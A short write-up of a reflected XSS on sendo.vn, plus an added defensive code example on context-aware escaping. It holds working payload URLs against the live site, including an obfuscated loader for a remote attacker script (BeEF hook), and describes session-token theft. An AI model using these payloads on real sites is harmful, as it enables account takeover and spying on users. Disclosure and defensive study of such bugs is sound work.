Sendo.vn reflected XSS
No-brainer: inserting "/><script>alert(1337)</script> into different places in the URL is my first step. I found an XSS, but exploiting it requires bypassing the Chrome XSS Auditor:
GET /cong-nghe/may-da-qua-su-dung/?%3E'%22%3E%3Cscript%3Ealert(906)%3C/script%3E
Let's try something else. After reading the source code for a while, I found this:
https://www.sendo.vn/cong-nghe/may-da-qua-su-dung/dien-thoai-cu/?category_id=1&sortType=vasup_desc&hang_san_xuat_2=1'%2Balert(1337)%2B'
then click on a tick box.
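The payload above only works because the value of hang_san_xuat_2 lands inside a single-quoted JavaScript string, so a quote in the input ends the literal. The following is an added example (not Sendo's code, and not from the author of this post) that models that bug class: a vulnerable renderer that concatenates the value raw, the hardened renderer a developer would replace it with, and two checks a reviewer can run on a rendered response. The template shape, the variable name filter and the check functions are assumptions made for the example; the parameter name is the one from this post.

```javascript
// Added example, not Sendo's code: a minimal model of the bug class in this
// post. The query parameter hang_san_xuat_2 (name taken from the post) is
// reflected inside a single-quoted string in an inline <script>. The template
// shape and the variable name "filter" are assumptions made for the example.

// Vulnerable: the reflected value is concatenated raw, so a ' in it ends the
// string literal and whatever follows runs as JavaScript.
function renderVulnerable(value) {
  return "<script>var filter = '" + value + "';</script>";
}

// Hardened: JSON.stringify supplies the quotes and escapes " and \ ; the extra
// replacements keep the value from ever containing </script>, other
// HTML-significant characters, or the line terminators U+2028/U+2029.
function escapeForScript(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderHardened(value) {
  return "<script>var filter = " + escapeForScript(value) + ";</script>";
}

// Check 1, HTML level: a reflected value that closes the script element
// shows up as a second </script> in the rendered output.
function scriptElementStaysClosed(html) {
  return (html.match(/<\/script>/gi) || []).length === 1;
}

// Check 2, script level: run the inline script with a stubbed alert() and
// see whether the value stayed data (alert never called, filter equals the
// input). new Function() stands in for the browser's engine here.
function executeInlineScript(html) {
  const body = html.slice("<script>".length, html.lastIndexOf("</script>"));
  const alertCalls = [];
  const run = new Function("alert", body + "\nreturn filter;");
  const filter = run((x) => { alertCalls.push(x); });
  return { filter, alertCalls };
}

// Constructed inputs: the quote breakout from this post and a tag breakout.
const PAYLOAD_QUOTE = "1'+alert(1337)+'";
const PAYLOAD_TAG = "</script><script>alert(1337)</script>";

function demo() {
  const vuln = executeInlineScript(renderVulnerable(PAYLOAD_QUOTE));
  const safe = executeInlineScript(renderHardened(PAYLOAD_QUOTE));
  return {
    vulnerableAlertCalls: vuln.alertCalls,   // [1337]: the input ran as code
    hardenedAlertCalls: safe.alertCalls,     // []: the input stayed data
    hardenedFilter: safe.filter,             // the literal input string
    vulnerableTagBreakout: !scriptElementStaysClosed(renderVulnerable(PAYLOAD_TAG)),
    hardenedTagBreakout: !scriptElementStaysClosed(renderHardened(PAYLOAD_TAG)),
  };
}

console.log(demo());
```

The point of the two checks is that a plain substring search for the payload is not enough: the hardened output still contains the characters 1'+alert(1337)+' verbatim, but inside a double-quoted JSON literal they are inert. What matters is the context the value is emitted into, which is why the fix is context-aware encoding rather than blocklisting quotes.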
Exploitation
In a real-life scenario, an attacker can easily set up BeEF as an exploitation framework and load its hook.js (or their own script) with document.write('https://evilwebsite.tld/hook.js');
Example payload:
https://www.sendo.vn/cong-nghe/may-da-qua-su-dung/dien-thoai-cu/?category_id=1&sortType=vasup_desc&hang_san_xuat_2=1'%2Bdocument.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,112,119,110,101,114,105,115,46,115,117,114,103,101,46,115,104,47,114,105,99,107,114,111,108,108,46,106,115,34,62,60,47,115,99,114,105,112,116,62))%2B'
Now the attacker can spy on every activity on Sendo of users who visited the crafted URL (screen capturing, keylogging, ...), tamper with the UI (phishing), and use their logged-in sessions to perform mischievous actions.
...or lazily make XHR GET requests to https://www.sendo.vn/general/login/getSession/ and steal victims' tokens.
Bonus: http://www.xss-payloads.com/payloads-list.html?a#category=all
This post is for educational purposes only.